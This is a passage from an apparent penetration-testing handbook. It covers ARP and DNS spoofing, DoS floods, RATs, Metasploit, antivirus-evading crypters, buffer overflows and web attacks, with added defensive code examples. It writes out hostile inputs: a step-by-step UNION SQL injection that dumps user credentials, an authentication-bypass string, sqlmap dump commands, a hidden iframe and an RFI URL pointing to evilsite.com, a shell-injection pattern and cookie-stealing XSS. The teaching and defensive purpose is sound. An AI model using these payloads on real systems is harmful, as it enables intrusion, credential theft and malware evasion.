We can also attempt to use all scripts using this command:
nmap --script all [ip]

zenmap
Zenmap is an nmap GUI that will allow us to easily understand the sometimes overwhelming amount of data that
nmap can provide.

Unicorn Scan
A scanning tool like nmap but, has a web GUI. (See Appendix for list of features)

unicornscan [ip]

autoscan

ARP Spoofing
Theory
ARP - A protocol for finding a MAC address for a host whose IP is known. It consists of a broadcast
request phase, a reply phase, and a confirmation phase.
ARP cache - The table containing MAC-IP match-ups.
ARP Spoofing (APR) - The technique used to poison ARP caches. A sniffer gets ARP packets from a
switch and proceeds to intercept them. Then it can route all network traffic to the attacker.
1. Host-A broadcasts on all ports. ARP Request
2. Host-B receives request and sends back reply. ARP Reply
3. Host-A sends confirmation to Host-B
By listening in, a sniffer could get all the MAC-IP match-ups on the network. By using this data we can
reroute packets through our machine and then out to the destination.
It does this by actively listening and then modifying standard ARP packets.


Victim Packet
              MAC        IP
Source        Attacker   Gateway
Destination   Victim     Victim

Gateway Packet
              MAC        IP
Source        Attacker   Victim
Destination   Gateway    Gateway

Limitations
Once in the attack stage, the attacker must reroute all traffic to the appropriate destinations while still
poisoning the ARP cache. There are 5 rules about APR attacks.
1. APR only works on LANs.
2. Attacker must reroute packets unless a DoS attack is preferred.
3. Attacker must know where to reroute packets.
4. APR will slow down the network as you are adding another layer to the network.
5. APR must update constantly. If not, the computer will delete the entries if it ARP requests an
address again.
6. An APR attack cannot be done against computers connected to the main router themselves. This is
because the router is able to intercept them before damage is done.
Also, APR attacks need to have some thought put into them.
1. One peer may be the Internet. If this is true you need to have the routing tables or be
broadcasting.
2. There could be multiple entrance/exits on a LAN
3. There may be anti-APR protections.
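Rule 5 above (the poisoner has to keep re-sending replies) and the packet tables above (one attacker MAC claiming both the gateway's and the victim's IP) are also what a defender watches for. As an added example that is not from the original notes, the shell functions below spot both symptoms in a stream of ARP replies. The reply records are constructed in a simple "reply <ip> is-at <mac>" form rather than real tcpdump output, and the addresses are placeholders.

```shell
#!/bin/sh
# Added example, not from the original notes: spot the two symptoms of ARP
# cache poisoning in a stream of ARP replies, namely an IP whose MAC changes
# and one MAC answering for several IPs. The reply records are constructed
# in a simple "reply <ip> is-at <mac>" form, not real tcpdump output.
#
# Poisoned sample: the gateway (.1) and victim (.10) answer genuinely first,
# then a third MAC (...:ff) claims both addresses and keeps repeating itself.
sample_arp_replies() {
    cat <<'EOF'
reply 192.168.0.1 is-at 00:11:22:33:44:01
reply 192.168.0.10 is-at 00:11:22:33:44:0a
reply 192.168.0.1 is-at 00:11:22:33:44:ff
reply 192.168.0.10 is-at 00:11:22:33:44:ff
reply 192.168.0.1 is-at 00:11:22:33:44:ff
EOF
}

# Healthy traffic for comparison: every IP keeps its MAC, every MAC one IP.
sample_clean_arp_replies() {
    cat <<'EOF'
reply 192.168.0.1 is-at 00:11:22:33:44:01
reply 192.168.0.10 is-at 00:11:22:33:44:0a
reply 192.168.0.1 is-at 00:11:22:33:44:01
EOF
}

# Read replies on stdin. Prints one CHANGED line the first time an IP is
# claimed by a MAC other than the one first seen, and one MULTI line at the
# end for each MAC that claimed more than one IP (the poisoner must claim both
# the gateway's and the victim's address to sit in the middle).
arp_anomalies() {
    awk '
        $1 == "reply" && $3 == "is-at" {
            ip = $2; mac = $4
            if (!(ip in first_mac)) first_mac[ip] = mac
            else if (first_mac[ip] != mac && !alerted[ip, mac]++)
                print "CHANGED", ip, first_mac[ip], "->", mac
            if (!seen[mac, ip]++) ip_count[mac]++
        }
        END { for (m in ip_count) if (ip_count[m] > 1) print "MULTI", m, ip_count[m] }'
}
```

`sample_arp_replies | arp_anomalies` prints two CHANGED lines and one MULTI line; the clean sample prints nothing. The "first MAC seen wins" rule is a simplification: on a real segment the baseline should come from a known-good inventory, otherwise a poisoner that is already active when monitoring starts is taken as the legitimate owner.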

Ettercap
Ettercap - A tool used for ARP spoofing.
Get hosts on a network: Hosts -> Scan for hosts
See list of hosts: Hosts -> Hosts list
Target 1 = Gateway
Target 2 = Victim
MITM -> ARP Poisoning to begin APR.

DNS Spoofing
DNS Spoofing - The tactic of making a malicious zone transfer to make a false IP-URL match-up.
This is done to send a target to a malicious website or DoS. EX: Google.com = attacker's IP
1. Run ettercap with a unified sniffer
2. Turn on DNS spoof plugin
3. APR
4. Start sniffer

OS Vulnerabilities
All OSs have vulnerabilities. It is a common misconception that Windows is the only OS with holes.
Exploit - A malicious piece of code which can compromise a system's security and give an attacker
access to that computer. They are used to penetrate and ultimately gain access to a system. They have a
broad range of payloads and can do just about anything.
Common vulnerabilities

Application Vulnerabilities

TCP Stack Overflows

Default permissions

Default security settings

The most popular, successful, and common attacks are in default services, software, or processes that
run on the computer. This is because the software is preinstalled and usually running by default.
However, there are holes in all software and they can be taken advantage of.

Vulnerability Assessment
Vulnerabilities are security flaws in software. They are caused by poorly written code and a lack of
testing. Patches fix holes. Unpatched systems are more vulnerable so you should always update all
software.
Vulnerability scanners

Nessus

Nikto

Security Websites

Bugtraq

CVE Sites

Milw0rm

exploit-db

Web Server Vulnerabilities


Web servers are extremely vulnerable because of many reasons.

Permanent connection to Internet

Most likely firewalled

Easier to exploit due to poor security.

Common vulnerabilities

Passwords stored in plain-text or code

Ability to traverse directories without getting 503.

Ability to execute scripts

Ability to bypass URL Checking and return a command prompt

Improperly patched and configured servers.

Database Vulnerabilities
All DB systems have holes. Database servers may be local or remote. Might be behind a firewall or
DMZ.
Common vulnerabilities

Misconfigured permissions

bad database objects

SQL injection

Default DB passwords

Null accounts/null sa account

Vulnerable to the application they serve

If application is poorly written it can allow for a compromise

TCP Stack Vulnerabilities


All OSs have this vulnerability. It is usually exploited for DoS attacks. It can be used to get in deeper
into a network.
Common Vulnerabilities

TCP Sequence Prediction (Session jacking)



TCP Window Size Overflow

Syn Flood

APR

DNS Poisoning (DNS Zone Transfers)

High Volume Attacks (Ping of Death, Smurf, Teardrop, Botnets)

Smurf - Pinging a system with a broadcast address to get the target to DoS other computers.
Teardrop - Sending malformed packets with bad IP fragments which causes an overflow on the TCP
stack and causes a DoS.

Application Vulnerabilities
These vulnerabilities affect almost all software. They usually stem from poor coding practices.
Common Vulnerabilities

Buffer Overflows

Weak Authentication

Poor Data Validation

Written with errors/poor error checking

Denial of Service
Theory
The idea is to force a victim to use so much RAM that the computer slows to a halt, crashes, and goes
offline. DoS attacks have become very mainstream as they often require little technical knowledge and
tools are widely available.

Flood Attacks
Flood attacks are a form of DoS attack that attempts to bring a system down by flooding it with
connections. This works because for every connection one makes, the computer must open up a slot in
RAM for the connection. As a result, the computer can become bogged down until it crashes or, stops
serving new connections.

Syn Flood
This abuses an issue in the TCP 3-way handshake that can be exploited by an attacker to take down a
service. This happens when an attacker (or several) sends many SYN requests to a server but never replies to
them. The server will wait until a time-out on the connection is reached, keeping a slot of RAM
occupied for a specified amount of time. The attacker(s) must open enough slots in memory before
their requests start timing out, or the attack will fail.

Mitigation for SYN Floods


The best way to deal with SYN floods is SYN cookies. SYN cookies work by sending the appropriate
SYN/ACK response but discarding the SYN packet it received, ensuring SYN floods fail. This is
because SYN floods rely on servers keeping the SYN packet for a specified period of time, so they can
fill up the queue.
Firewalls can also easily detect flood attacks as, most have built in rules about the maximum
connections one address is allowed to have.

UDP Flood
This abuses a flaw in UDP stateless connections where, when no service is listening on a port, the host replies
with an ICMP unreachable. As a result, an attacker must only send a large number of UDP packets
to different ports that are closed. The server will then respond with a large number of ICMP
packets, causing the system to eventually go offline.

Mitigation for UDP Floods


Firewalls should be installed to filter out non-open ports, causing the UDP flood to fail as the UDP
packets never reach the intended host.

ICMP Flood
This attack involves sending massive amounts of ping packets to a host, forcing a reply. The idea is
similar to the previous flood attacks as, the system must open a slot of RAM to deal with the ping.

Mitigation for ICMP Floods


ICMP floods are easily stopped by firewalls. Most firewalls have automatic ICMP flood detection
systems built in.

Smurf Attack
Smurf attacks involve spoofing source IP address to get a system to flood another system. The system
who receives the spoofed packet believes the supplied source address is the one that sent it. As a result,
this causes the system to respond to the source address. If spammed with said spoofed packet the server
will, in turn, spam the victim.

Mitigation for Smurf Attacks


Simple firewall rules should stop this kind of attack.

Ping Of Death
This attack involves sending malformed ping packets in an attempt to cause a crash on the victim. The
crash can be either the TCP stack or the system itself.
These attacks don't work much any more. They only tend to work on much older systems.

Teardrop
This attack involves sending mangled IP fragments in an attempt to cause a crash on the system. These
attacks don't work much either.
However, the last documented case was in 2009 and for Windows Vista and 7. It had to do with SMB
not handling IP fragments properly.

LOIC
Low Orbit Ion Cannon or LOIC is a popular tool for flood attacks. This tool has the ability to send
TCP, UDP and ICMP floods at a specified host.
LOIC has been used heavily by the group Anonymous, and has helped down many unsavory sites like
RIAA and MPAA.

SSL DoS
This attack has been known about since 2003 and is a flaw regarding SSL's renegotiation feature. This
allows an attacker to down a server completely from just one connection rather than many like in
traditional flood attacks.
The hack was first made public by the THC Team.

Exploits
Exploit - A malicious piece of code meant to compromise a system.

Compiling
Some exploits need to be compiled before use. This is because one exploit might not fit every system.
You usually must edit the code and then compile it.
For C and C++ you must use the gcc compiler.
gcc -o <app> <file>

This will compile the code under the application name <app>.
For python, Perl, Ruby, and other scripting languages.
chmod +x <file>

To find useful exploits cat and grep /pentest/exploits/exploitdb/files.csv


Warning! Some exploits may be unreliable.


Resources
Exploit code site

milw0rm.com - Down

exploit-db.com

Remote Administration Tools


Theory
Remote Administration Tools or RATs allow an attacker to take complete control of a remote computer,
often allowing them to spy and infect other users on a network. The goal of these tools is to make it
easy for an attacker to administrate many bots, and also, formulate attacks against other targets using
these bots.

Uses
Many free and commercial RATs are available for download. They often allow an attacker to keylog,
steal passwords, perform flood attacks, and even remotely view the user's screen and webcam. Attackers
often route their internet connections through infected hosts when attacking servers to ensure
anonymity.

Darkcomet

CyberGate

Solitude

Cerberus

Blackshades


Metasploit
Metasploit is an open source exploitation framework used to simply and easily write exploit code for
applications. It is written in Ruby and extremely powerful. It has many great features which make it a
great addition to any pen-tester's library.

msfconsole
This program opens an interactive console for Metasploit.
msfconsole

This lets us pass commands to Metasploit in an interactive environment.


From here we can type commands directly to MSF.

msfcli

msfweb

msfgui

Updating Metasploit

Exploitation

Payloads

Meterpreter

Encoders


Auxiliary

Credential Collection

db_autopwn

Browser Autopwn

Anti-virus Bypass
Theory
Anti-virus bypassing is any sort of program that attempts to bypass an anti-virus to get a malicious
program on a machine. This is often done by using code obfuscation techniques to hide the
malicious code.

Droppers
Droppers are programs that contain no malicious code but, go out to the internet and download and
execute a malicious program.

Theory
Droppers are a semi-competent threat, despite being picked up by anti-viruses most of the time.
However, the age-old rule applies that the longer a dropper has been around, the more susceptible it is
to being caught. Newer droppers might not have this problem.
They are dangerous because an anti-virus can't keep tabs on everything running on a computer in real time. Abusing this, a dropper downloads a program inconspicuously and then runs it.

Crypters
Crypters are programs designated to encrypt an executable so an anti-virus may not pick it up.

Theory
Crypters work by encrypting an executable using any number of methods and then affixing a program,
called a stub, to the front of it to decrypt the code. This allows us to have better control over the
conditions our code runs in and to ensure undetection by hiding our executable in other processes.


The Encrypter
The encrypter works in this fashion:
1. Generate a stub source code file.
2. Compile the stub.
3. Place the stub at the beginning of a file.
4. Place a unique separator after the compiled stub.
5. Open a malicious executable.
6. Encrypt this executable.
7. Place the encrypted executable at the end of the file.
When the executable is run, the stub springs into action and decrypts and runs the code.

The Stub
A stub works like this:
1. Find the current directory of the process.
2. Open the executable.
3. Look for the unique separator.
4. Take only the encrypted executable and save it.
5. Decrypt the executable.
6. Inject the decrypted executable into a random process but, first, try to inject into explorer.

Antis
Antis are functions in a crypter that stop the executable from running if certain programs are running.
For instance, a common anti is to stop the execution of the program if it is inside a VMware virtual
machine. Another is to not run if Sandboxie is running. Antis are generally a smart idea if you are
afraid that your executable might come under suspicion at some point.

Junk Code

Buffer Overflows
Buffer overflows are one of the most commonly exploited attacks according to OWASP. The attack's potency
can range from a DoS to a full system compromise, making it a dangerous vulnerability to have present.


Theory
Buffer Overflow - An exploit that presents itself in C/C++ but, theoretically, can be exploited in any
language that allows a program to commit data to memory without first checking the bounds of that data.
A buffer overflow occurs when a program commits user input to memory without first checking its bounds.
When the overflow hits the stack it causes a segmentation fault, which under normal circumstances
results in a crash. In an attack, however, the attacker can overwrite the saved return address on the
stack, and with it the EIP register, gaining control of program flow. Depending on the severity of the
bug and the protections in place, exploiting it differs from case to case.
Consider this code.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    char buffer[8];

    if (argc < 2)
        return 1;
    strcpy(buffer, argv[1]); /* copies the 1st argument into buffer with no bounds check */
    printf("buffer is %s\n", buffer);
    printf("DONE!\n");
    return 0;
}

This code creates a buffer which accepts 8 characters. However, no bounds checking is done. As a result,
an exploiter could input more than 8 characters into the buffer and have it still write to memory. This
could allow an attacker to take control of the program flow.

Protections
As a result of widespread exploitation, many protections have been developed to combat it.
ASLR - Stands for Address Space Layout Randomization. This protection randomizes the top bits of the
addresses of program code and of the stack, making it harder for exploiters to reliably locate launchpad
instructions. It's extremely popular and used in almost everything.
DEP - Stands for Data Execution Prevention. This comes in two forms, hardware and software, and is
controlled by the /NX flag. The hardware version marks data memory non-executable, stopping exploits
from succeeding. A developer can still mark certain memory areas executable, in case they need to execute
data from them. Software DEP is analogous to SafeSEH.
Stack Cookies - Controlled by the /GS flag. This places a random 8 byte key before the saved EIP on the
stack. Before a return is executed, the program checks the key against the one it stored. If they don't
match (meaning an overflow occurred and the saved EIP may be modified), it stops execution and terminates
the program to prevent exploitation.


SafeSEH/SEHOP - A compiler option that sets a linked list of SEH pointers. If an SEH pointer doesn't
match up with the list, it is not executed and the program is terminated.
NoSEH - This disables SEH, stopping exploits that rely on it.

Common Attacks
Despite the ample protections, none of them are fool-proof.
Launchpad - This technique is used to bypass ASLR. Due to the stack's address randomization, you can't
jump EIP directly to the top of the stack, since the address won't be the same after a reboot. Instead,
you find a non-ASLR module and search for a JMP ESP instruction. Using this, you can jump to the top of
the stack reliably.
SEH Overwrite - This takes advantage of SEH chains with no protections. You overwrite an SEH pointer
with your own code, letting it go to a launchpad.
Egghunters - An egghunter is a piece of shellcode meant to rip through pages in memory looking for a
specific pattern called an egg key. This egg key is usually 8 bytes in length. Skape wrote a large paper
on the subject, detailing different methods one could use to rip through memory without triggering
exceptions.
Bypassing Stack Cookies - Stack cookies are a huge problem for exploiters as it is difficult to get
around them. The easiest method is to overwrite the SEH chain and then trigger an exception before the
check is reached. This method is easily broken by SafeSEH or NoSEH. The other way is to figure out a way
to guess or calculate a stack cookie. Skape also wrote a piece on reducing the effective entropy of a
stack cookie.

Problems
Bad Characters - Bad characters are bytes that have special meaning or are filtered out or transmuted
during an exploit. Common ones are 0x00, 0x0a and 0x0d. 0x00, for example, is a C++ string terminator
and, when used in an exploit, deletes everything past the 0x00 byte. 0x0a and 0x0d are the line feed and
carriage return characters.
Null Byte Addresses - Main program code (code contained within the executable itself) starts at
0x00??0000. As a result, one cannot use addresses from the main executable, as they will contain a 0x00
byte.
Character Transmutation - This is a problem that happens when input is filtered or encoded before being
committed to a buffer. For instance, a program might strip out any non-ASCII characters (anything outside
00-7F). Anything higher will get transmuted. This also happens in Unicode to ASCII translation.

Fuzzers
Fuzzer - A debugging program made to find buffer overflows by varying buffer size.
SPIKE - A well made fuzzing application. It has its own scripting language.
Sfuzzer - A simple fuzzer meant to be an easier alternative to SPIKE.


Fuzzing works by passing commands to a server with varying data sizes. If the program crashes during a
fuzz, it is possibly vulnerable to a buffer overflow. For instance, take a program that accepts network
data and then copies this data to the stack. A fuzzer will try A x 20 for the data. If that doesn't crash
it, it will send A x 40, and so on. If the program does no bounds checking, it will eventually crash when
the buffer size gets too big and overwrites EIP.

Web Based Attacks


Web based attacks are a very large set of attacks that can be performed on web applications. Often,
these attacks involve a program not sanitizing user supplied data correctly.

Zero Frames and Zero Images


Zero frames and zero images are a way of hiding attack HTML from the view of a webpage. Zero frames are
created by setting an iframe's width and height to zero or one, so that a webpage is rendered that the
user cannot see. This is a common way for attackers to hide malicious code in legitimate webpages,
infecting users without their knowledge.
<iframe height=0 width=0 src=http://evilsite.com></iframe>

Zero images work on the same principle but with an image. You can't render an entire webpage with one,
though. It is more commonly used in cross site request forgery attacks.

Command Execution
Command execution takes advantage of unsanitized user input, which allows an attacker to inject
commands directly into the server. This vulnerability usually takes advantage of a shell_exec() call in
PHP.
Command execution techniques vary from OS to OS. Linux, for instance, with zero user input
sanitization, could be compromised with:
[space]&[space][command]; [command];

However, be aware that in most scripts, you may have to satisfy certain requirements before the input
will be passed along.
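The root cause above in Python rather than PHP, as an added example that is not from these notes: the same user-supplied value is either concatenated into a shell command line, where `&` and `;` end one command and start another, or validated against a strict allow-list and passed as an argument vector so no shell ever parses it. The wrapped `ping` command and the hostname pattern are my assumptions; nothing here is executed.

```python
import re

# Allow-list for the one thing this handler legitimately needs: a hostname made
# of letters, digits, dots and hyphens (an assumption for the demo).
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")

# Characters a POSIX shell treats as the end of one command and the start of
# another, or as a command substitution.
SHELL_SEPARATORS = (";", "&", "|", "`", "$(", "\n")


def command_vulnerable(host):
    # What shell_exec() receives when the user's value is concatenated
    # unchecked: the shell, not the program, decides where the command ends.
    return "ping -c 1 " + host


def shell_sees_extra_command(cmd):
    return any(sep in cmd for sep in SHELL_SEPARATORS)


def argv_safe(host):
    # Validate first, then build an argument vector. Handed to subprocess.run()
    # as a list (or, in PHP, wrapped with escapeshellarg()), the value is never
    # parsed by a shell, and the allow-list has already rejected separators.
    if not HOST_RE.fullmatch(host):
        raise ValueError("rejected host: %r" % (host,))
    return ["ping", "-c", "1", host]


def host_is_accepted(host):
    try:
        argv_safe(host)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The page's pattern [space]&[space][command]; with a harmless constructed marker.
    tainted = "example.com & echo INJECTED;"
    print(command_vulnerable(tainted), "->", shell_sees_extra_command(command_vulnerable(tainted)))
    print("accepted:", host_is_accepted(tainted), host_is_accepted("example.com"))
```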

Cross Site Request Forgery


Cross Site Request Forgery, or CSRF, is an attack that abuses authentication mechanisms that allow
users to stay logged in even after the website is closed in the browser. CSRF allows an attacker to
force a user to perform actions without their knowledge or consent. How it works is, an attacker makes
a URL that links to an action performed on a site. For instance:
http://www.vulnsite.com?password=ichangedthis&passwordconf=ichangedthis&submit=submit

This example, if opened by an authenticated user, would change their password to ichangedthis. If the
link is opened directly, the user would see that the action was performed. A better way to do it is to
wrap the URL in <img> tags to make a zero image. This would result in a hidden image that, when
loaded, would cause the action to be performed without the user's knowledge. You can also use a zero
frame for this.
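A server-side defence against the forged request above, as an added example that is not from these notes: a hypothetical password-change handler only accepts POST and requires a token derived from the victim's session with an HMAC, which a third-party page embedding the URL in a zero image cannot supply. The query string is the page's; `change_password`, the server secret and the session id are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Per-deployment secret, generated at start-up for this demo.
SERVER_SECRET = secrets.token_bytes(32)

# The page's forged URL: a state change triggered by a plain GET.
FORGED_URL = ("http://www.vulnsite.com?password=ichangedthis"
              "&passwordconf=ichangedthis&submit=submit")


def csrf_token(session_id):
    # Bound to the victim's session. A page on another origin can make the
    # browser send the session cookie, but it cannot read it, so it cannot
    # compute this value to put in the request.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_password(method, session_id, params):
    """Hypothetical handler for the page's password-change action."""
    if method != "POST":
        return "rejected: state change requires POST"
    if not hmac.compare_digest(params.get("csrf", ""), csrf_token(session_id)):
        return "rejected: missing or wrong CSRF token"
    if params.get("password") != params.get("passwordconf"):
        return "rejected: confirmation does not match"
    return "changed"


def params_from_url(url):
    # Flatten parse_qs's list values into a plain dict of form fields.
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def forged_image_request(session_id):
    # What a zero <img src=FORGED_URL> produces: a GET carrying the victim's
    # cookie (hence the victim's session_id) but no token.
    return change_password("GET", session_id, params_from_url(FORGED_URL))


def legitimate_request(session_id):
    # The real form: POST, with the token the server embedded in the page.
    params = params_from_url(FORGED_URL)
    params["csrf"] = csrf_token(session_id)
    return change_password("POST", session_id, params)


if __name__ == "__main__":
    print("forged  :", forged_image_request("victim-session"))
    print("genuine :", legitimate_request("victim-session"))
```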

File Inclusion
These attacks revolve around files being included in PHP without restriction.
http://vulnerablesite.com?page=include.php

This attack comes in two forms, LFI (Local File Inclusion) and RFI (Remote File Inclusion).

Local
An LFI takes advantage of the ability to traverse directories locally, without interference, on the
system. As a result, certain files could be handed to the attacker, like the /etc/passwd file on
Linux.
http://vulnerablesite.com?page=/etc/passwd

Remote
An RFI takes advantage of being able to load other files into the include. This can be more dangerous,
as it can allow an attacker to run commands using the shell_exec() function in PHP.
http://vulnerablesite.com?page=http://evilsite.com/evil.php

SQL Injections
A form of attack meant to pass commands directly to an SQL server by using escape characters and
malformed input. It can also be used to bypass authentication mechanisms by way of forcing a field to
be true. It can also trick an SQL server into revealing database information.

URL
Say we have a site.
www.vulnsite.com

This site loads a page called updates.php, to which the URL passes parameters.
www.vulnsite.com/updates.php?id=1

Here we can pass parameters to the PHP application by changing the 1 in the URL to whatever we
want. From here, we can begin testing to see if the site properly filters user input. It's easy to check this
by passing the application a character that would raise an exception in the MySQL database. We can
achieve this with a single quote ( ' ) character.

www.vulnsite.com/updates.php?id=1'

We can tell if the application is vulnerable if an error is thrown:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ''' at line 1

We can see that user input is not filtered properly and, as a result, we will be able to inject our own
SQL statements.
First, we need to identify how many columns are in the table that controls the data on the page. We can
do this by issuing commands to the server via the URL that will throw an error if a column does not
exist. The ORDER BY statement will work for this.
www.vulnsite.com/updates.php?id=1 ORDER BY 1;#

Alternatively, you can also use
www.vulnsite.com/updates.php?id=1 ORDER BY 1--

This will most likely produce no errors, as the database will more than likely have more than one
column. We slowly increase the number until an error is thrown.
Unknown column '20' in 'order clause'

Once we get the error, we can infer that the table has one column fewer than the number that threw the
error, since it worked before the number was increased again.
Once we know this, we can begin injecting data directly into our page in an attempt to find vulnerable
columns. The goal is to find someplace on the page to display the data we will be collecting later. We
do this with a UNION SELECT statement. We form the statement with as many columns as we found.
www.vulnsite.com/updates.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8;#

Also note that we change the page id to one that is not likely to exist, -1. This allows us to easily
identify vulnerable columns.
Upon doing this we can inspect the page and see some of the numbers in our UNION SELECT showed
up on the page. These numbers represent our vulnerable columns. We can inject commands and use
these vulnerable columns to render this data visible to us.
We can inject a variety of commands in here to better understand the back-end servers.
For this example, we will pretend 1, 2 and 3 are all vulnerable columns.
www.vulnsite.com/updates.php?id=-1 UNION SELECT @@VERSION,USER(),DATABASE(),4,5,6,7,8;#

This will put the current database version number in column one, the current database user in column
two and the database name in column three.
Next we are going to want to get the table names from the information_schema. Be wary of the version
number: MySQL 4 will not let you read from the information_schema without elevated privileges.


www.vulnsite.com/updates.php?id=-1 UNION SELECT group_concat(table_name),@@VERSION,DATABASE(),4,5,6,7,8 from information_schema.tables where table_schema=database();#

This will stuff the table names, separated by commas, into a vulnerable column. This allows us to see
all the tables that we may want to compromise. By using this, we can begin to enumerate the contents
of the tables.
For this example, we will pretend that the tables listed were content, users, and admin.
www.vulnsite.com/updates.php?id=-1 UNION SELECT group_concat(column_name),2,3,4,5,6,7,8 from information_schema.columns where table_name='users';#

This will tell us all the column names for the table users. Once we have these, we can begin pulling out
relevant information.
For this example, we will pretend the columns listed for users were username, password, email, and id.
www.vulnsite.com/updates.php?id=-1 UNION SELECT group_concat(username,0x3a,password,0x3a,email,0x3a,id),2,3,4,5,6,7,8 from users;#

This prints all the table data to the screen and separates each column with a colon (0x3a).
Here we have completed our attack and accessed the previously hidden table data.

Authentication Bypass
This kind of attack is done by forging SQL queries that will always return true. This way we can bypass
the login of a site, allowing us access without a legitimate account.
An example would be a site that takes both a username and a password.
Upon putting in a correct username and password, a user can get in. Upon putting in a wrong username
and password, a person is denied access.
This is done through an SQL query similar to this.
SELECT * FROM users WHERE username='$user' and password='$pass';

By escaping the quotes, we can authenticate ourselves without even knowing the password and
sometimes, even the username.
A simple authentication bypass statement would look like this.
User: admin Password: 1' OR '1' = '1';#

This would make the statement:
SELECT * FROM users WHERE username='admin' and password='1' OR '1' = '1';#';

Since the end quote and semicolon are commented out, the statement's syntax is correct. Beyond that, we
can see that the condition in the password section will always be true, since 1 is always equal to
itself.
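The always-true WHERE clause above, run against a constructed SQLite table as an added example that is not from these notes: the concatenated query matches every row for the page's `1' OR '1' = '1` input (the MySQL `;#` tail is dropped because SQLite has no `#` comment and the template's own closing quote completes the literal), while the parameterised version treats the same string as just a password value. The table contents are made up.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the page's `users` table (SQLite, in memory).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cret-admin-pw"), ("alice", "wonderland")])
    return con


def matching_rows_vulnerable(con, user, pw):
    # The page's query with $user and $pass pasted straight into the SQL text.
    # AND binds tighter than OR, so the WHERE becomes
    # (username='admin' AND password='1') OR ('1' = '1'), true for every row.
    query = ("SELECT * FROM users WHERE username='%s' and password='%s'"
             % (user, pw))
    return con.execute(query).fetchall()


def login_vulnerable(con, user, pw):
    return len(matching_rows_vulnerable(con, user, pw)) > 0


def login_safe(con, user, pw):
    # Same logic, but the driver binds the values separately from the SQL text,
    # so a quote inside the input stays data instead of ending the literal.
    query = "SELECT * FROM users WHERE username=? and password=?"
    return con.execute(query, (user, pw)).fetchone() is not None


if __name__ == "__main__":
    con = make_db()
    bypass = "1' OR '1' = '1"   # the page's payload without the MySQL ';#' tail
    print("vulnerable login   :", login_vulnerable(con, "admin", bypass))
    print("rows matched       :", len(matching_rows_vulnerable(con, "admin", bypass)))
    print("parameterised login:", login_safe(con, "admin", bypass))
```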


Blind

SQLmap
SQLMap is a tool for automated SQLi attacks. It will automatically find and pull vulnerable columns and
display the data from the tables it enumerates.
First off we need to use SQLmap to get a list of the databases.
./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 --dbs

This will brute force the available databases, allowing us to continue with our next step, enumerating
the tables.
./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 -D [database] --tables

Lastly, we can dump a table's contents using the dump option.
./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 -D [database] -T [table] --dump

Cross Site Scripting (XSS)


Cross site scripting, or XSS, allows an attacker to inject code into URLs or webpages. These attacks
often lead to mass compromises, since the attacker can upload things like Java drive-bys into a
reputable website. These attacks are commonly used to steal authentication cookies, allowing an
attacker to impersonate a victim.

Non-Persistent
These attacks aren't as bad as a persistent attack but can be just as damaging.
The attack involves abusing some form field or URL parameter that is not sanitized. This allows an
attacker to craft a special URL that, when the victim opens it, will reflect attack code onto the
webpage. This kind of attack is the most popularly exploited.
It involves storing code in the URL parameters, allowing an attacker to give a specific URL to people
and, when they follow it, render attack code on the page.
www.vuln.com/updates.php?location=<p>EVIL CODE HERE!</p>

Persistent
Persistent XSS attacks allow an attacker to post client-side code directly into the webpage. This has
obvious malicious implications as anyone who visits that site can become compromised.
For instance, imagine a website that takes a comment and posts it onto a webpage. An attacker could
store HTML code in the comment if proper character checking is not in place.
For example, an attacker's comment could be:
<P>EVIL COMMENT</P>

However, that is not malicious but, does allow us to test the problem. We can be more malicious with:
<Script>
alert(document.cookie);
</Script>

This will display the current cookie for the domain.


In some cases the script tags can be filtered out by a script. However, script tags aren't the only
dangerous thing.
<a href=Fake.html onmouseover=javascript:alert(document.cookie);>FAKE</a>

This will run JavaScript if the link is hovered over. Other methods could be iframe or zero image
attacks.
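Output encoding for the stored comment and the link cases above, as an added example that is not from these notes: the comment is HTML-escaped in text context, and the link's href is always quoted and limited to absolute http(s) URLs, which neutralises both the `<Script>` comment and the unquoted-attribute event handler. The page's payloads are used as inputs; the function names are mine.

```python
import html
from urllib.parse import urlsplit


def render_comment_vulnerable(comment):
    # The page's scenario: the stored comment is dropped into the HTML as-is.
    return "<p>" + comment + "</p>"


def render_comment(comment):
    # Text context: &, <, >, " and ' become entities, so a stored <Script>
    # block is displayed as text instead of being executed.
    return "<p>" + html.escape(comment, quote=True) + "</p>"


def render_link(href, label):
    # Attribute context. Two separate controls are needed here:
    #  - the attribute value is always quoted, so a space in the input cannot
    #    start a new attribute such as onmouseover=... (escaping alone would
    #    not stop that in an unquoted attribute);
    #  - only absolute http(s) URLs are accepted, which also rules out
    #    javascript: URLs, something escaping never addresses.
    parts = urlsplit(href)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        raise ValueError("href must be an absolute http(s) URL")
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True),
                                    html.escape(label, quote=True))


def link_is_accepted(href):
    try:
        render_link(href, "FAKE")
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    stored = "<Script>alert(document.cookie);</Script>"   # the page's comment payload
    print(render_comment_vulnerable(stored))
    print(render_comment(stored))
    print(link_is_accepted("Fake.html onmouseover=javascript:alert(document.cookie);"))
    print(render_link("http://example.com/Fake.html", "FAKE"))
```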

Web Based Exploitation Frameworks


OWASP Mantra

Port Tunneling
Port Tunneling - Redirecting network traffic to a port or proxy so as to avoid detection, firewalls, or
network blocks.

Theory
In the following example the attacker is in the cloud and the victim is behind a firewall that blocks all
traffic on port X.
Tunneling works like so:
1. The attacker connects and sends data to the proxy on port X.
2. The proxy then forwards the data from port X to port Y.
3. The victim receives the data on port Y and sends out a reply through Y.
4. The proxy forwards the data from port Y to port X.
5. The proxy sends the data through port X to the attacker.
